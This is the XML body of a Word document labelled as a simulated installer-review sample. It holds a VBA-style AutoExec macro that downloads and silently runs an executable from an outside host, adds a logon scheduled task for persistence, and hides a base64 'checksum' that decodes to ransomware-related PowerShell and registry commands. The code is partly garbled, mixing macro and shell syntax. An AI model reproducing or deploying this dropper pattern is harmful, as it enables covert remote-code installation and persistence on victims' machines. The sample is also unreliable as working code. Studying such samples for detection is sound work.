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xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <w:body>
    <w:p><w:r><w:t xml:space="preserve">SIMULATED ARTIFACT - ANALYSIS SAMPLE - INSTALLER REVIEW</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">Module WraithInstaller</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">Sub AutoExec()</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">Set shell = CreateObject("WScript.Shell")</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">URLDownloadToFile "https://wraith-update.online/download/installer.php?next=1&code=77e88f99", "C:\Users\Public\setup.exe"</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">Shell("C:\Users\Public\setup.exe /silent /norestart")</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">schtasks /create /tn WraithUpdater /tr "C:\Users\Public\setup.exe" /sc onlogon</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">SaveToFile "C:\ProgramData\wraith.db"</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">Installer bundles the payload with an embedded license prompt.</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">Checksum (base64): TW9kZSBSYW5zb213YXJlU3R1ZmYgQ2FsbE9mZmljZSBJbnZvaWNlTGF5b3V0ICgpIFNoZWxsICJwb3dlcnNoZWxsIC1FbmNvZGVkQ29tbWFuZCAyOTI0dWpzIiBEdW5kICJjbWQgL2MgcmVnIGFkZCBIS0xNIFNvZnR3YXJlXFJhbnNvbVdhcmUi</w:t></w:r></w:p>
  </w:body>
</w:document>

</file>